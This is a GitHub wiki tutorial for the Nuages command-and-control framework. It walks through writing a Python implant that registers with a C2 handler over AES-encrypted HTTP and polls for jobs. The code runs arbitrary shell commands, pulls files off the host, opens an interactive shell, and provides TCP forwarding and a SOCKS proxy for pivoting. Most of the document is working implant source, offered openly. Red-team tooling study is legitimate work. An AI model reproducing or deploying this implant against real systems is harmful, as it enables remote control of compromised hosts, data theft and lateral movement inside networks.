-
-
Notifications
You must be signed in to change notification settings - Fork 81
Tutorial: Creating a custom implant
- Introduction
- Communicating with the Nuages API
- Implementing the Nuages API
- Implementing Simple Jobs
- Implementing Intermediate Jobs
- Implementing Complex Jobs
- Conclusion
It's been a year since I created Nuages and the project as come a really long way. I have been wanting to create a python Implant for linux/MacOS hosts for a while and I figured it would be a good way to demonstrate how easy it is to create a full-featured implant using the Nuages API.
The following tutorial will go through the process of building the implant in python using the Nuages API, and should be used as a guideline for people wanting to write their own implants in any language.
The features we will implement are:
- Command execution
- File Upload
- File Download
- Interactive Channels
- Socks Proxying
- TCP fowarding
It take five minutes to get a Nuages Server running on a debian hosts with mongodb and node installed:
We need our implant to go through a handler. We are going to start with the simple HTTPAES256 Python handler. Nuages does abstraction of the Handler so we can add support for more handlers in the future and all the features will still work!
Let's start by running the handler:
The handler's protocol is fairly simple and it should be possible to reuse a lot of its code given that it is written in Python. The rough details of the communication protocol can be found here.
This handler is accessible over HTTP post requests, we can start by writing a simple POST request using the python requests module, and then adding encryption using the AESCipher class from the Handler code.
class NuagesConnector:
def __init__(self, connectionString, key):
# The URL of our handler
self.connectionString = connectionString
# The seed to generate our encryption key
self.aes = AESCipher(key)
def POST(self, url, data):
# The Json data is sent encrypted in the request body
encrypted_data = self.aes.encrypt(bytes(data, 'utf-8'))
# The target URL is sent as Base64 in the Authorization header
encrypted_url = base64.b64encode(self.aes.encrypt(bytes(url, 'utf-8')))
headers = {'Authorization': encrypted_url}
r = requests.post(self.connectionString, encrypted_data, headers=headers)
if(r.status_code != 200):
raise Exception(r.status_code)
# The result must be decrypted
return self.aes.decrypt(r.content)
nuages = NuagesConnector("http://127.0.0.1:8080","password")
response = nuages.POST("register","")
print(response)
Perfect! We are talking to Nuages through the Handler:
Now that our implant can talk to Nuages, we can get continue by implementing the different API calls that the Implant must use. There are only four API calls needed to perform all the different features: register, heartbeat, jobresult and io. We will only need the first three to get started. We can find a brief description of the implant logic here, and the API documentation can be found here.
The first thing the implant must do is registering. Using the register API call, the Implant provides some information about itself to the server and receives an ID in exchange. We can create a NuagesImplant class and a register method to obtain the id:
def __init__(self, nuages, config):
# This is the connector object the implant will use to communicate with the API
self.nuages = nuages
# A configuration dictionary
self.config = config
# The implant gathers all the information about itself when it is created
self.os = platform.system()
if self.os == "Windows":
self.username = os.getenv("username")
else:
self.username = os.getenv("LOGNAME")
self.hostname = socket.gethostname()
self.ip = socket.gethostbyname(self.hostname)
self.handler = "HTTPAES256"
self.implantType = "Python"
self.connectionString = self.nuages.connectionString
self.supportedPayloads = ["cd", "command", "configure", "upload", "download", "interactive", "tcp_fwd", "socks"]
def register(self):
# The implant information is put into Json
data = json.dumps({'os': self.os,\
'hostname': self.hostname,\
'localIp': self.ip,\
'username': self.username,\
'handler': self.handler,\
'implantType': self.implantType,\
'connectionString': self.connectionString,\
'supportedPayloads': self.supportedPayloads
})
self.id = ""
# We use the connector to obtain an id from the server
while self.id == "":
response = self.nuages.POST("register", data)
self.id = json.loads(response)["_id"]
time.sleep(5)
# Creating a connector
nuages = NuagesConnector("http://127.0.0.1:8080","password")
config = {}
# Creating the implant
implant = NuagesImplant(nuages, config)
# Registering the implant
implant.register()
When we run the code, we can see in the client that the implant is successfully registered:
Now that our implant is registered, we can implement the main method of our implant. The start method will get it started and the heartbeat method will be called periodically. The heartbeat API call is used to send jobs to the Implant: the Implant sends its ID and receives a list of jobs from the server.
def heartbeat(self):
# The implant send it's ID and receives a list of jobs as a response
data = json.dumps({'id': self.id})
response = self.nuages.POST("heartbeat", data)
return json.loads(response)["data"]
def start(self):
self.register()
while True:
jobs = self.heartbeat()
time.sleep(int(config["sleep"]))
nuages = NuagesConnector("http://127.0.0.1:8080","password")
config = {}
config["sleep"] = "1"
implant = NuagesImplant(nuages, config)
implant.start()
The last API call we need to implement before being able to execute jobs is jobresult. This API call is used by the Implant to return the result of a job to the Server. If the result is too large, it can be chunked into pieces.
def jobResult(self, job_id, result, error):
# The implant wont send more than this amount of data per request
buffersize = int(self.config["buffersize"])
i = 0
l = len(result)
# If the result is empty a single request is needed
if(l == 0):
data = json.dumps({'moreData': False,\
'jobId': job_id,\
'result': "",\
'error': error})
self.nuages.POST("jobResult", data)
return
# Let's chunk the result into pieces and submit them to the server
while(i < l):
if(i + buffersize >= l):
data = json.dumps({
'moreData': False,\
'jobId': job_id,\
'result': result[i:],\
'error': error})
else:
data = json.dumps({
'moreData': True,\
'jobId': job_id,\
'result': result[i:i+buffersize],\
'error': error})
i += buffersize
self.nuages.POST("jobResult", data)
Now that we have our basic API calls implemented we can start implementing our first jobs!
Job payloads are in the format {Type: "", Options: {}} and can be implemented in anyway desired, although using standardized payloads enables more compatibility for modules and clients down the road. A list of standard payloads can be found here
We can add logic to the start function to execute the payloads based on the types. Additionally, we add a generic exception handler to return errors to the server in case of failure. The jobs are executed in separate threads to enable multi tasking.
def executeJob(self, job):
try:
if (job["payload"]["type"] == "command"):
self.do_command(job)
elif (job["payload"]["type"] == "cd"):
self.do_cd(job)
elif (job["payload"]["type"] == "exit"):
self.do_exit(job)
elif (job["payload"]["type"] == "configure"):
self.do_configure(job)
elif (job["payload"]["type"] == "download"):
self.do_download(job)
elif (job["payload"]["type"] == "upload"):
self.do_upload(job)
elif (job["payload"]["type"] == "interactive"):
self.do_interactive(job)
elif (job["payload"]["type"] == "tcp_fwd"):
self.do_tcp_fwd(job)
elif (job["payload"]["type"] == "socks"):
self.do_socks(job)
except Exception as e:
# If the job fails, we inform the server
self.jobResult(job["_id"], str(e), True)
raise e
def start(self):
# Registering the implant
self.register()
while True:
try:
# Obtaining jobs
jobs = self.heartbeat()
for job in jobs:
# Executing each job in a new thread
t = Thread(target=self.executeJob, args=([job]))
t.daemon = True
t.start()
time.sleep(int(config["sleep"]))
except Exception as e:
pass
The command payload is the most important as it enables code execution on the implant. It is very simple to implement in Python:
def do_command(self, job):
# If a path is provided we execute the job in that path
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
# The command is executed
child = subprocess.Popen(job["payload"]["options"]["cmd"], shell = True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
result = child.communicate()[0]
error = (child.returncode != 0)
# The result is returned to the server
self.jobResult(job["_id"], result.decode("utf-8"), error)
We can now execute commands on the implant:
The cd payload is mostly used for convenience.
def do_cd(self, job):
# The path to execute the CD command from (dir may be a relative path)
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
# The path to CD into
if ("dir" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["dir"])
# The new directory is returned to the server
self.jobResult(job["_id"], os.getcwd(), False)
As simple as it is, I think having this payload implemented makes our lives a lot easier:
Another simple job used to kill the implant.
def do_exit(self, job):
# The implant exits with a message
self.jobResult(job["_id"], "Bye!", False)
os._exit(0)
This payload enables the implant to be reconfigured.
def do_configure(self, job):
# If the config must be changed
if ("config" in job["payload"]["options"]):
config = job["payload"]["options"]["config"]
# We change all the keys that are defined in the job
for key in config:
self.config[key] = config[key]
# We return the configuration to the client at text
self.jobResult(job["_id"], json.dumps(self.config), False)
Now that we have the basics covered, we can continue with more complicated payloads, that are using unidirectional Nuages pipes.
Nuages Pipes are virtual streams that implants and clients can communicate with through the io endpoint of the Nuages API.
Nuages Pipes can be read from and/or written to, and can be connected to any NodeJs Stream objects such as files, process input/output, TCP Sockets etc.
Nuages Pipes can create virtual streams between Implant and Server, or between Client and Implant.
To implement a download job, we will be reading from a Nuages pipe and outputting its result to a Python file writer stream. Let's implement a pipe2stram method first:
def pipe2stream(self, pipe_id, stream, bytesWanted):
bytesRead = 0
# The implant configuration is used
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
# Until the whole file has been loaded from the pipe
while (bytesRead < bytesWanted):
# We dont want to read more from the pipe than the size of our buffer
body["maxSize"] = min(buffersize, bytesWanted - bytesRead)
response = json.loads(self.nuages.POST("io", json.dumps(body)))
if("out" in response):
# The output is encoded in Base64
buffer = base64.b64decode(response["out"])
bytesRead += len(buffer)
# We can write the bytes to the stream
stream.write(buffer)
time.sleep(refreshrate)
Now that we have the pipe2stream method, the download job is very easy to implement:
def do_download(self, job):
# If a path is provided we execute the job in that path
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
# The file argument could be a directory, in which case we will
# use the default file name and write the file to that directory
if os.path.isdir(job["payload"]["options"]["file"]):
os.chdir(job["payload"]["options"]["file"])
target = job["payload"]["options"]["filename"]
else:
target = job["payload"]["options"]["file"]
# We open the file stream
with open(target, "wb") as fs:
# We use pipe2stream to pipe the Nuages pipe into the filestream
self.pipe2stream(job["payload"]["options"]["pipe_id"], fs, job["payload"]["options"]["length"])
self.jobResult(job["_id"], fs.name, False)
Files can now be downloaded to the implant:
Uploads will use a similar logic as Downloads except we will pipe the file stream to the Nuages pipe this time. We can start by implementing the stream2pipe method:
def stream2pipe(self, pipe_id, stream):
# The implant configuration is used
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
# We dont want to read anything from the pipe
body["maxSize"] = 0
buffer = [1]
# While we can buffer bytes fromt the file stream
while (len(buffer) > 0):
buffer = stream.read(buffersize)
# The bytes are base64 encoded and sent to the stream
body["in"] = base64.b64encode(buffer).decode("ascii")
self.nuages.POST("io", json.dumps(body))
time.sleep(refreshrate)
Similarly, now that we have the stream2pipe method, it is very simple to write the do_upload method:
def do_upload(self, job):
# If a path is provided we execute the job in that path
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
if os.path.isdir(job["payload"]["options"]["file"]):
raise "This is a directory"
# We open the file stream
with open(job["payload"]["options"]["file"], "rb") as fs:
# We use stream2pipe to pipe the filestream into the Nuages pipe
self.stream2pipe(job["payload"]["options"]["pipe_id"], fs)
self.jobResult(job["_id"], fs.name, False)
Our Implant can now upload files:
We have a basic implant, with code execution, upload and download. Let's move on to more interesting features!
These final three payloads are using bidirectional Nuages Pipes.
I personally love this payload even though I rarely use it. I think it's really cool to get an interactive shell on an implant, especially when the traffic is tunneled through a more advanced handler such as Slack or DNS. We will need to create a process and sync it's input/output/error streams with a Nuages pipe.
We will need two new pipe methods:
- pipe_read: Reads any data available in a pipe
- pipe_readwrite: Writes data to the pipe and returns available data
def pipe_read(self, pipe_id):
buffersize = int(self.config["buffersize"])
body = {}
body["pipe_id"] = pipe_id
# We inform the server that we have a maximum buffer size
body["maxSize"] = buffersize
response = json.loads(self.nuages.POST("io", json.dumps(body)))
if("out" in response):
# We decode the output and return it as bytes
return base64.b64decode(response["out"])
else:
return b''
def pipe_readwrite(self, pipe_id, data):
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
# We inform the server that we have a maximum buffer size
body["maxSize"] = buffersize
buffer = b''
sentBytes = 0
l = len(data)
# Until we have sent all the data we need to send
while (sentBytes < l):
# We cant send more than our buffer
bytesToSend = min(buffersize, l - sentBytes)
# The data is sent as base64
body["in"] = base64.b64encode(data[sentBytes:sentBytes + bytesToSend]).decode("ascii")
sentBytes += bytesToSend
response = json.loads(self.nuages.POST("io", json.dumps(body)))
if("out" in response):
# If there is data in the stream it is appended to our buffer
buffer += base64.b64decode(response["out"])
time.sleep(refreshrate)
# We return any data that we read
return buffer
This two methods will make writing do_interactive easier. It ended up being pretty tricky to write this method as python blocks on read attempts to a process' stdout. The solution was to create a separate thread to read from stdout and place the output in a queue.
def enqueue_output(proc, queue):
while(proc.poll() == None):
queue.put(proc.stdout.read(1))
def do_interactive(self, job):
refreshrate = float(self.config["refreshrate"]) / 1000
# If a path is provided we execute the job in that path
if ("path" in job["payload"]["options"]):
os.chdir(job["payload"]["options"]["path"])
command = [job["payload"]["options"]["filename"]]
if ("args" in job["payload"]["options"]):
args = job["payload"]["options"]["args"]
if(args!=""):
command.extend(args.split(" "))
# We create a process object and pipe it's output
proc = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
pipe_id = job["payload"]["options"]["pipe_id"]
# We create a queue to communicate with the enqueuing thread
queue = Queue()
# We create a thread that reads from the process and put the bytes in the queue
# This is necessary as python blocks on process.stdout.read() operations
t = Thread(target=enqueue_output, args=(proc, queue))
t.daemon = True
t.start()
line = b""
try:
# While the process is still running
while(proc.poll() == None):
# If there are bytes in the queue, they come from stdout/stderr
try: line += queue.get_nowait()
except Empty:
if(len(line) == 0):
# If stdout was empty, we just need to read from the pipe
inbuffer = self.pipe_read(pipe_id)
else:
# If not, we write the bytes to the pipe
inbuffer = self.pipe_readwrite(pipe_id,line)
# If we received data from the pipe, we feed it into stdin
if(len(inbuffer) > 0):
proc.stdin.write(inbuffer)
proc.stdin.flush()
time.sleep(refreshrate)
line = b""
except Exception as e:
del queue
raise e
del queue
self.jobResult(job["_id"], "Process Exited!", False)
I think the result is pretty cool:
The logic behind TCP forwarding is similar to the interactive payload. We will open a client TCP stream and sync it with a Nuages pipe bidirectionally. We can reuse the pipe_read and pipe_readwrite methods.
def do_tcp_fwd(self, job):
host = job["payload"]["options"]["host"]
port = int(job["payload"]["options"]["port"])
pipe_id = job["payload"]["options"]["pipe_id"]
refreshrate = float(self.config["refreshrate"]) / 1000
buffersize = int(self.config["buffersize"])
# We open a client TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# We set a very short timeout on the socket to prevent hanging as
# we dont know the amount of data we are reading from the socket
s.settimeout(refreshrate)
try:
while True:
outbuff = ""
try:
# We try to read from the socket
outbuff = s.recv(buffersize)
# This timeout is normal
except socket.timeout:
if(len(outbuff) == 0):
# If the buffer is empty, we just need to read from the pipe
inbuff = self.pipe_read(pipe_id)
else:
# If not, we send it to the pipe and receive data from the client
inbuff = self.pipe_readwrite(pipe_id, outbuff)
time.sleep(refreshrate)
# We write what we received from the pipe to the socket
s.sendall(inbuff)
pass
else:
# If the socket did not timeout but returned "", it has been closed
if(len(outbuff) == 0):
self.jobResult(job["_id"], "Server closed connection", False)
return
# If we read an entire buffer before timeout (seems very unlikely)
else:
inbuff = self.pipe_readwrite(pipe_id, outbuff)
time.sleep(refreshrate)
s.sendall(inbuff)
except Exception as e:
# If the pipe has been deleted
if(str(e) == "404"):
self.jobResult(job["_id"], "Client closed connection", False)
return
else:
raise(e)
That was a lot simpler than expected! We can now use our implant to pivot over tcp:
Last but not least, the socks proxy. It is the most useful payload in my opinion as it makes pivoting a breeze. It should not be to hard to write now that we have the TCP forwarding payload working. We will be using the SOCKS4 and SOCKS5 RFCs as a reference. We need two final pipe method:
- pipe_readbytes: This method reads an exact number of bytes from the Nuage pipes
- pipe_write: This method writes to the pipe without reading
These method will help when implementing the socks handshakes as we need to control the amount of data sent/received.
def pipe_readbytes(self, pipe_id, bytesWanted):
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
buffer = b''
# We read from the pipe until we have read the amount we want
while (len(buffer) < bytesWanted):
# We dont want to read more than needed
body["maxSize"] = min(buffersize, bytesWanted - len(buffer))
response = json.loads(self.nuages.POST("io", json.dumps(body)))
if("out" in response):
# We append the read data to our buffer
buffer += base64.b64decode(response["out"])
time.sleep(refreshrate)
# We return the buffer
return buffer
def pipe_write(self, pipe_id, data):
buffersize = int(self.config["buffersize"])
refreshrate = float(self.config["refreshrate"]) / 1000
body = {}
body["pipe_id"] = pipe_id
# We dont want to read from the pipe
body["maxSize"] = 0
sentBytes = 0
l = len(data)
# Until we have sent all the data we need to send
while (sentBytes < l):
# We cant send more than our buffer
bytesToSend = min(buffersize, l - sentBytes)
# The data is sent as base64
body["in"] = base64.b64encode(data[sentBytes:sentBytes + bytesToSend]).decode("ascii")
sentBytes += bytesToSend
self.nuages.POST("io", json.dumps(body))
time.sleep(refreshrate)
Now we can implement the socks 4/5 protocols and apply the same logic as the TCP forwarding payload once the connection is established.
The function is truncated to only show the SOCKS4 implementation in the page, but the full function is available in the Implants directory of Nuages.
def do_socks(self, job):
refreshrate = float(self.config["refreshrate"]) / 1000
buffersize = int(self.config["buffersize"])
pipe_id = job["payload"]["options"]["pipe_id"]
# We read two bytes from the client
rBuffer = self.pipe_readbytes(pipe_id, 2)
# If it is a socks 5 connection
if(rBuffer[0] == 5):
# Truncated
# If it is a socks 4 connection
elif(rBuffer[0] == 4):
# We ensure that we can understand the command type
if(rBuffer[1] != 1):
# If not we respond to the client
self.pipe_write(pipe_id, bytes([0, 91]))
raise Exception("Invalid socks 4 command")
# We read the port number from the client
buffPort = self.pipe_readbytes(pipe_id, 2)
port = buffPort[0] * 256 + buffPort[1]
# We read the IP address from the client
ipv4 = self.pipe_readbytes(pipe_id, 4)
host = str(ipv4[0]) + "." + str(ipv4[1]) + "." + str(ipv4[2]) + "." + str(ipv4[3])
# We read these useless bytes from the client
while(rBuffer[0] != 0):
rBuffer = self.pipe_readbytes(pipe_id, 1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# We establish the connection
s.connect((host, port))
except Exception as e:
# We complete the handshake with failure
wBuffer = bytes([0, 91]) + ipv4 + buffPort
self.pipe_write(pipe_id, wBuffer)
raise(e)
# We complete the handshake with success
wBuffer = bytes([0, 90]) + ipv4 + buffPort
self.pipe_write(pipe_id, wBuffer)
s.settimeout(refreshrate)
## Truncated, the code is the same as for the TCP forwarding implant afterwards
And our last payload is complete!
We have completed the Implant with all the features we wanted. It took about 5 hours to write, which I think is pretty fast given the features implemented.
Of course this is not a weaponized implant but I think it's a decent POC and a good introduction to Nuages development.
The Full Implant can be found here: https://github.com/p3nt4/Nuages/blob/master/Implants/NuagesPythonImplant/NuagesPythonImplant.py